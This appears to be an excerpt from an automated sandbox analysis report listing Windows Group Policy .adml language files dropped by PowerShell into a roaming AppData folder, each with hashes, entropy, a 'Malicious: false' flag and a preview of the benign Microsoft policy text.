Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DiskQuota">Disk Quotas</string>.. <string id="DQ_Enable">Enable disk quotas</string>.. <string id="DQ_Enable_Help">This policy setting turns on and turns off disk quota management on all NTFS volumes of the computer, and prevents users from changing the setting.....If you enable this policy setting, disk quota management is turned on, and users cannot turn it off.....If you disable the policy setting, disk quota management is turned off, and users cannot turn it on.....If this policy setting is not config

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DistributedLinkTracking.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (575), with CRLF line terminators
Category:	dropped
Size (bytes):	1218
Entropy (8bit):	4.961559763430255
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yQJmjI7JMHkJNMLsDe7MBMZc1zcqoFV:cgeD5x8gm8fKxmEPnMLkeKMokFV
MD5:	8B49ABCA606DF290D14944330F11A796
SHA1:	5FD7496C8553485972A7B35E75386A0CB98199AF
SHA-256:	25D3882376CC864E14BF8CBD16065971C8C5F1C88FCEF7C60B4213604F893272
SHA-512:	F7C3B0CE37F00F281DCDF46A421295D2CD79298852B2302624CD4AFD27EED160FFB4B9003C2096851DD884E8708000282D55876CFC1FA853DCB437FA65D3F8F3
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DLT_AllowDomainMode">Allow Distributed Link Tracking clients to use domain resources</string>.. <string id="DLT_AllowDomainMode_Explain">Specifies that Distributed Link Tracking clients in this domain may use the Distributed Link Tracking (DLT) server, which runs on domain controllers. The DLT client enables programs to track linked files that are moved within an NTFS volume, to another NTFS volume on the same computer, or to an NTFS volume on another computer. The DLT client can more reliably track links

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DnsClient.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (896), with CRLF line terminators
Category:	dropped
Size (bytes):	31344
Entropy (8bit):	4.717542963262439
Encrypted:	false
SSDEEP:	384:zlbkZcHOReR932i5D5Zbng2C5stOeoXYaYENfOenLtWeoXYaYENfwleyLLhbxEHq:u5XYlXYfleQlnzmW
MD5:	7B88F32185E7AEE9D215D367F531C628
SHA1:	086E5D851CBD967E907A54539DA3DE95F2F53916
SHA-256:	A60EA72F20C54DC7362CB26A10970B4BEDAC5E257E20317BD2CACA1E289DB08D
SHA-512:	70CF1A3642D0C6D6866B713DE7A52857CB550C6490B8C62A9605BEFE3811525C3081DCE9DE9F881C361FE88694C256EB03EA168FD489BE9CB0AC48AE4F244BAE
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DNS_Client">DNS Client</string>.. <string id="DNS_Domain">Connection-specific DNS suffix</string>.. <string id="DNS_Domain_Help">Specifies a connection-specific DNS suffix. This policy setting supersedes local connection-specific DNS suffixes, and those configured using DHCP.....To use this policy setting, click Enabled, and then enter a string value representing the DNS suffix.....If you enable this policy setting, the DNS suffix that you enter will be applied to all network connections used by computers

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\EAIME.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	7775
Entropy (8bit):	4.801945943527714
Encrypted:	false
SSDEEP:	192:Els7BYDGrS9SqHBf0IpqGKJkPsmcjtJiANpyhSz9zxbBiy:A0bMsBHiANpyh89zxbl
MD5:	A2F0FA1F7B955635BAEF6D42E1019FAD
SHA1:	52F10ED5BB525A53AD000BAB3D0AD3A8CC696CB9
SHA-256:	F54FFC98753D1F03710F912F456B1639B18EC692D2E41FF529A79C5BA8A38B8B
SHA-512:	1BB3F4D5A8895C0AA0373E6EBA93636B022BB9709DE40408C46924664A63390593B386EF5A3968F0DBA8DB31F02AFB20455C7AAB95E2498DEB466E89C335D0D9
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="L_IME">IME</string>.. <string id="L_TurnOnMisconversionLoggingForMisconversionReport">Turn on misconversion logging for misconversion report</string>.. <string id="L_TurnOnMisconversionLoggingForMisconversionReportExplain">This policy setting allows you to turn on logging of misconversion for the misconversion report.....If you enable this policy setting, misconversion logging is turned on.....If you disable or do not configure this policy setting, misconversion logging is turned off. ....This policy sett

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\EarlyLaunchAM.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (335), with CRLF line terminators
Category:	dropped
Size (bytes):	2537
Entropy (8bit):	4.7263609685346974
Encrypted:	false
SSDEEP:	48:yafKUwDTjsFQCzwDNgVC2G1KJzDD8xr2rZkwJXW2V:yuujKQCzwDWC2G1wzDQr2rZkaV
MD5:	75AAE2A1219696C7D046F25DA1C331B8
SHA1:	0E20307FC43CECFD876B2A03CE998204A4A9D932
SHA-256:	5A5BAD4A99052A7DFFAD794A712F606F4421D0323AF8BA4121BB02034C917C1C
SHA-512:	18DE3563DB066BB209792A31096B0B98BDF8C2BFE9BBE077D9F2443513F60D3896ACECA4362D26F08F1CF43E3E37EEE242D2E608958E0CFF2136DA65A9B1AB46
Malicious:	false
Preview:	<policyDefinitionResources revision="1.0" schemaVersion="1.0">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ELAMCategory">Early Launch Antimalware</string>.. <string id="POL_DriverLoadPolicy_Name">Boot-Start Driver Initialization Policy</string>.. <string id="POL_DriverLoadPolicy_Name_Help">This policy setting allows you to specify which boot-start drivers are initialized based on a classification determined by an Early Launch Antimalware boot-start driver. The Early Launch Antimalware boot-start driver can return the following classifications for each boot-start driver:..- Good: The driver has been signed and has not been tampered with...- Bad: The driver has been identified as malware. It is recommended that you do not allow known bad drivers to be initialized...- Bad, but required for boot: The driver has been identified as malware, but the computer cannot

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\EdgeUI.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4475
Entropy (8bit):	4.731397984218957
Encrypted:	false
SSDEEP:	48:cs+D5x8gm8fK0QfhWpiSbXFNWf7DwirbOgSuvmrIvZZsSuvLD49MCD49Ms+qDxsL:P+D5pmYYh7SeDDrbQUCMOZxq0/tWFV
MD5:	47245202B642C2B6443C63A220226B22
SHA1:	6C3DEDBC58314BF1EDCA6EA0D8161E80B8013B1D
SHA-256:	59B4266A7E379E4047910594D63B44F4A251684A3C97F74CC16585B2779871AD
SHA-512:	4470B0A9568B88965C077F8690BB48BEA88D15A148F2C402D47C17EBB6F52BFB1194FB4B0C328E22DC3772FEF38DCF4E0D33FC966312CAFDFCFA1D0F2539D7E8
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2011 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="EdgeUI">Edge UI</string>.. <string id="EdgeUI_Help">Contains settings related to system user interfaces attached to the screen edges.</string>.. <string id="TurnOffBackstack">Turn off switching between recent apps</string>.. <string id="TurnOffBackstack_Help">If you enable this setting, users will not be allowed to switch between recent apps. The App Switching option in the PC settings app will be disabled as well.....If you disable or do not configure this policy setting, users will be allowed to sw

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\EncryptFilesonMove.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1260
Entropy (8bit):	4.910898508580554
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61ykJvSmJjbLgn7OL2dOrL0ZFp4D/FV:cgeD5x8gm8fKvJDJ074rFV
MD5:	F09A4E370D3321A61FC7456B9A007360
SHA1:	58E0F3E0213B3FF00E2C6694D6A0D3A71D9DE55E
SHA-256:	E32ECF04721C0695C125F1F8E3ECC0ED14179FC85045C1C44C0D4CCDAA74D085
SHA-512:	0BEB4C675E79A2234CAD73F0ADBCAE49B7ED4CD8F62BD6DAC0985EB4C9DBF7C3387B2CEB74C67C2D0052287FD436BECF8D415D22ED72AAB7B296E15C9DFEFECC
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NoEncryptOnMove">Do not automatically encrypt files moved to encrypted folders</string>.. <string id="NoEncryptOnMove_Help">This policy setting prevents File Explorer from encrypting files that are moved to an encrypted folder.....If you enable this policy setting, File Explorer will not automatically encrypt files that are moved to an encrypted folder.....If you disable or do not configure this policy setting, File Explorer automatically encrypts files that are moved to an encrypted folder.....This setting ap

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ErrorReporting.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (790), with CRLF line terminators
Category:	dropped
Size (bytes):	30768
Entropy (8bit):	4.691623979168484
Encrypted:	false
SSDEEP:	384:hAUh6Hw6B8HwwHhZK3KwrQGj4UQ6ic6jKqBO1Mck1S:hAU8MwwHnwiUQXro
MD5:	8AB1308CBA6530C458F432AB454C3070
SHA1:	099E6CF6F6108281974B2992B3B40E0AED58A994
SHA-256:	0E087D6F548B2CDBF2C2EA12CE78DC4F8B9D1A4979AE6FD955CAC4D350AAFABD
SHA-512:	C19FDEC863339CB92AF86EE3C2244A13E330B4641241A693D1BD61128AB3A13076652AAD0AC8EB8D757760437311CB12CD94D43AC947CE0361EEA7E8DC99E60D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Error Reporting</displayName>.. <description>Windows Error Reporting</description>.. <resources>.. <stringTable>.. <string id="CAT_WindowsErrorReporting">Windows Error Reporting</string>.. <string id="CAT_WindowsErrorReportingAdvanced">Advanced Error Reporting Settings</string>.. <string id="CAT_WindowsErrorReportingConsent">Consent</string>.. <string id="PCH_AllOrNoneDef">Default application reporting settings</string>.. <string id="PCH_AllOrNoneDef_Exclude">Do not report any application errors</string>.. <string id="PCH_AllOrNoneDef_Help">This policy setting controls whether errors in general applications are in

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\EventForwarding.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2548
Entropy (8bit):	4.859559586253688
Encrypted:	false
SSDEEP:	24:3KbFDiCUSNsojnPFc9QABiRop6FkY060S9vEWmwlCXFfD1ui/5asx6g7wGuVmoeV:65DySNPjPuSRopa0i8tFBnBrhwGZoeV
MD5:	0A764BB7FD1C2BC83CBBA71BDC3F8EB0
SHA1:	A7234960D73C854F981680AD4691ACCC5E3F2024
SHA-256:	EF69C13304DBA64691227AC0C87F03C89120BEB6003722C43E390BDA572331AD
SHA-512:	0F5E549755270FD2E40669321F4E69581BBCB79CE7D905BB6E95E9251C10B76681C6ED19BA623D17C8AD56DD39A6D0104BE60DD0B5FE8045BC4EB8217ED4E772
Malicious:	false
Preview:	<?xml version="1.0"?>..<policyDefinitionResources revision="1.0" schemaVersion="1.0">...<displayName>Event Forwarding</displayName>.....<description>Policy Definitions For Event Forwarding</description>.....<resources>......<stringTable>.......<string id="EventForwarding">Event Forwarding</string>.... <string id="ForwarderResourceUsage">Configure forwarder resource usage</string>.. <string id="ForwarderResourceUsage_Help">This policy setting controls resource usage for the forwarder (source computer) by controlling the events/per second sent to the Event Collector.....If you enable this policy setting, you can control the volume of events sent to the Event Collector by the source computer. This may be required in high volume environments.....If you disable or do not configure this policy setting, forwarder resource usage is not specified.....This setting applies across all subscriptions for the forwarder (source computer).</string>.. .....<

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\EventLog.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	7756
Entropy (8bit):	4.821366715902771
Encrypted:	false
SSDEEP:	192:EuPOfDUFRKtm/P2R7gHzBwRTLfdpSJlIau:bPOfA+g2RCudH
MD5:	B58D99D32DF6E1076E976FA8ABC3EEEA
SHA1:	4AB6E78ECDC35F98D09AE29B0D7C8D9AB19A91FD
SHA-256:	2863EF5940EC4685D1CF61891191647CE435F325720BC9626A0F2214F56E6EC9
SHA-512:	9A0FF4D6D9BB1A53F01A24DD946945CAB0D4A48053035A8435B4CFB0DCF7690C0CC418E72911FCFBA8379617D328253C236F307F62D1627B0087747816D6AAFE
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Channel_Log_AutoBackup">Back up log automatically when full</string>.. <string id="Channel_Log_AutoBackup_Help">This policy setting controls Event Log behavior when the log file reaches its maximum size and takes effect only if the "Retain old events" policy setting is enabled.....If you enable this policy setting and the "Retain old events" policy setting is enabled, the Event Log file is automatically closed and renamed when it is full. A new file is then started.....If you disable this policy setting and th

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\EventViewer.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2368
Entropy (8bit):	4.905404060928818
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yQHXEjH4Mj1Zy3snm5R0mM/CJ4tFOmBXOm70oV:cgeD5x8gm8fKI/szB4tFZUoV
MD5:	45EB132CB1F927D22C54EC385A552153
SHA1:	634D98CB8F8BFE12E9CD19CD4764DFCF134CC011
SHA-256:	8911189FB55D6DE6DA90E3ED57336AA7F2323520CF2719CED2E91B76B4AB085D
SHA-512:	32ECD99085199B267FEA70CA5363DFF1270BC083107E80368FD7F48C69E8646078ACFFA3206692CF3F2BF447D4EBB5BBB251F32F1DD712927F836F5751FF47AF
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="EventViewer">Event Viewer</string>.. <string id="EventViewer_RedirectionProgram">Events.asp program</string>.. <string id="EventViewer_RedirectionProgram_Help">This is the program that will be invoked when the user clicks the events.asp link.</string>.. <string id="EventViewer_RedirectionProgramCommandLineParameters">Events.asp program command line parameters</string>.. <string id="EventViewer_RedirectionProgramCommandLineParameters_Help">This specifies the command line parameters that will be p

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Explorer.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (311), with CRLF line terminators
Category:	dropped
Size (bytes):	4363
Entropy (8bit):	4.775276168335737
Encrypted:	false
SSDEEP:	96:LeD5pmUZsDKU5h9ERZR2s0vJVu2MNFBBzUysV:EpZsDx9g0vJVBMNXBzi
MD5:	B8789197191F1A2C461797C595FD8415
SHA1:	DDCB4910A18C318E8E90CF29A92FE70ADFDB20EE
SHA-256:	6CBA67BF6D239FA46E6F2566F1F8653DCBA053DC828AA731DD768C525AF1BB1D
SHA-512:	D05BF9DE3D8ADD27206F4819283E89533AC83ED97AF159023EF46393B5CAB9D5D95D4C32D15C21A0E895CE3820418D71D29553E420F1ADAE7225AEEEFBE1A91E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AlwaysShowClassicMenu">Display the menu bar in File Explorer </string>.. <string id="AlwaysShowClassicMenu_Help">This policy setting configures File Explorer to always display the menu bar.....Note: By default, the menu bar is not displayed in File Explorer.....If you enable this policy setting, the menu bar will be displayed in File Explorer.....If you disable or do not configure this policy setting, the menu bar will not be displayed in File Explorer.....Note: When the menu bar is not displayed, users can ac

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ExternalBoot.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2806
Entropy (8bit):	4.897245212995506
Encrypted:	false
SSDEEP:	48:cgeD5x8gmFa0I0aUFxafehoPd7idK6a0WaZP5Zo5Z0fd5Z1zarCaO5ZVwKd5ZUwY:LeD5pmFa0I0a4afIa9aZPMcda2aOSYvY
MD5:	8417153A964B75197B8A08F35D62C381
SHA1:	2A4820E67495FCCC524E72AFAB923803755C9F2B
SHA-256:	F8B25ED02542858011F65AE02EBD1C4A62558EE28B76A281656FCF1A70E772BC
SHA-512:	F1DEC0EA5AA367C94CCE27B71B3412FCE370CFF75DF44CCEA5CA931BB52992B30D252144188DFA93FE9E5EF573419DF8BCAEAE9C5DFBA8936E24C80CBDC4D291
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Portable Workspace</displayName>.. <description>This file contains Portable Workspace policy settings.</description>.. <resources>.. <stringTable>.. <string id="PortableOperatingSystem">Portable Operating System</string>.. <string id="PortableOperatingSystem_Launcher_DisplayName">Windows To Go Default Startup Options</string>.. <string id="PortableOperatingSystem_Launcher_Help">....This policy setting controls whether the PC will boot to Windows To Go if a USB device containing a Windows To Go workspace is connected, and controls whether users can make changes using the Windows To Go Startup Options Control Panel item.....If you enable

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\FileHistory.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	988
Entropy (8bit):	5.031142948192133
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3F6Et8mTc48vzNgW4ZdNHW4fFV:cgeD5x8gm/TagW4Z/HW4fFV
MD5:	76EF9C90CFE65DE37CDBCD4847D584BE
SHA1:	72977FE03FBED6B2FF3C750405CA0838A547471A
SHA-256:	9341A249C8DB566C91BD171482DAA2FAF9D17EF757DB6CBE6829F75D4FCE9492
SHA-512:	2788E014B9335C70D55EBC24139D09C862D3D016B043566A126E2956B53622F443AEE92B5C28BA83B5C670AD03D948BB6D4435B090BFBB992E33DC2F83D01E2F
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>File History</displayName>.. <description>File History</description>.. <resources>.. <stringTable>.. <string id="FileHistoryName">File History</string>.. <string id="DisableFileHistory">Turn off File History</string>.. <string id="DisableFileHistory_explanation">This policy setting allows you to turn off File History.....If you enable this policy setting, File History cannot be activated to create regular, automatic backups.....If you disable or do not configure this policy setting, File History can be activated to create regular, automatic backups.</string>.. </stringTable>.. </resources>..</policyDefinitionResources>..

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\FileRecovery.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2975
Entropy (8bit):	4.8069063103068785
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKn8YD6KENYYqgFd67gJDqrq5x0BsYukrtP4XEgV:LeD5pm3D0uWFm2DaqjCswtPeV
MD5:	353E01C633CBAF640B8238C535A4E3BC
SHA1:	0FC2C8473CB1298245F8D2893D796C3B3BEA14EC
SHA-256:	3A5992E2DC42003E6F1547CE4253134CF8C6270DA6F68FCB6E3FA854B07FADE1
SHA-512:	A7BE0B5FF87A6EEBD9A1CCA5F72DF27DD9A1DBEB127ADE55AC80CA10C7A5084EB87ECE4143724E5920057F6E533AE809E551C62E88876CCF8A16FAF8AB8A1358
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Corrupted File Recovery</string>.. <string id="WdiScenarioExecutionPolicy">Configure Corrupted File Recovery behavior</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting allows you to configure the recovery behavior for corrupted files to one of three states:....Regular: Detection, troubleshooting, and recovery of corrupted files will automatically start with a minimal UI display. Windows will attempt to present you with a dialog box when a system restart is

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\FileRevocation.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (591), with CRLF line terminators
Category:	dropped
Size (bytes):	2614
Entropy (8bit):	4.778560797244179
Encrypted:	false
SSDEEP:	48:c4D5FL8golENFW8jxk1tQYY4DXOc3I+4QZHD75LhhAOoXV:RD5FPoWNFWweQD4TV1Zv5LhHoXV
MD5:	85E6DEC7D2E9D6A930AE1A7B4C9E6CE9
SHA1:	A8C71091F223CD0DCDF3AA8AE4A2D6E1888FD69E
SHA-256:	1E5E1B42CFB88B5072DADEB281779586616FC8A3493F66EE17557A19D9ABC27D
SHA-512:	F0076C0E98DE7CBD06723E647B7CF654CF85CE262832321606FCA066B22FC4C70635D183F2E1F8BD77AA9FC99F9EDEE8BF909DD8708AA3C01F0A8164FEEE9D98
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8" standalone="yes"?>.. (c) Microsoft Corporation -->..<policyDefinitionResources xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0">.. Documentation says these are optional, but GPEdit does not agree-->.. <displayName>File Revocation Policy Settings</displayName>.. <description>File Revocation Policy Settings</description>.. <resources>.. <stringTable>.. <string id="FileRevocationCategory">File Revocation</string>.. <string id="DelegatedPackageFamilyNames_Name">Allow Windows Runtime apps to revoke enterprise data</string>.. <string id="DelegatedPackageFamilyNames_Help">Windows Runtime applications can protect content which has been associated with an enterprise identifier (EID), but can only revoke access to content it protected. To allow an application to revoke

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\FileServerVSSProvider.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1516
Entropy (8bit):	4.992519754988731
Encrypted:	false
SSDEEP:	24:2dgeD5eo8g4t4+3Fbef61yjhZEPaREbCF2LRz8u4tUtTY45y9Qy52fKKnKHPaMfV:cgeD5x8gU8fK8hOaRmC0Rz8u4tYTFynR
MD5:	BFBE8A2102D1DAD98FC3B6A7C9D49809
SHA1:	D2B7FA51C1458FF163A3A687687BC79615A0950E
SHA-256:	DA1FFF29710B8B4D5D3361E38FE64B66D7A39F70AB98D23F02C2F285C7298817
SHA-512:	798D71F3589C310441205512EDF99AC939A53BD7A4381BE6908722C9C41B03788AE7BE9D2B59083D7D39E76D9CFA8D7EA1DD4BCFD3800602188A6185C64B6941
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.2" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. Component name -->.. <string id="Cat_FileShareShadowCopyProvider">File Share Shadow Copy Provider</string>.. Component name -->.... <string id="Pol_EncryptProtocol">Allow or Disallow use of encryption to protect the RPC protocol messages between File Share Shadow Copy Provider running on application server and File Share Shadow Copy Agent running on the file servers.</string>.. <string id="Pol_EncryptProtocol_Help">Determines whether the RPC protocol messagese used by VSS for SMB2 File Shares feat

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\FileSys.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (466), with CRLF line terminators
Category:	dropped
Size (bytes):	5047
Entropy (8bit):	4.778189792452432
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fK0BR2avs7FFiTs5UXs5Zg3NZRWwzL9oaVdQMxITRnRZ6LutwOXsQU:LeD5pmus7asQsyxVOnJIV
MD5:	F1951FB8C3B9EEBE23ABEF5EE23DBA39
SHA1:	FBAB4967D796A04FB164024D8C543D676E44BD24
SHA-256:	40A867EB9B6B1644CDF87AC77D346485DA153B245603237FA9A76E2C68ACFD4B
SHA-512:	9604C7324D2FE2EC3C40D90E0C3747B6BBBF20186F7A6A695D947C9F1FEB727875066CC700C31291BA156C0BA83893917AF4A7BEDC37208D4500B88DF22D9079
Malicious:	false
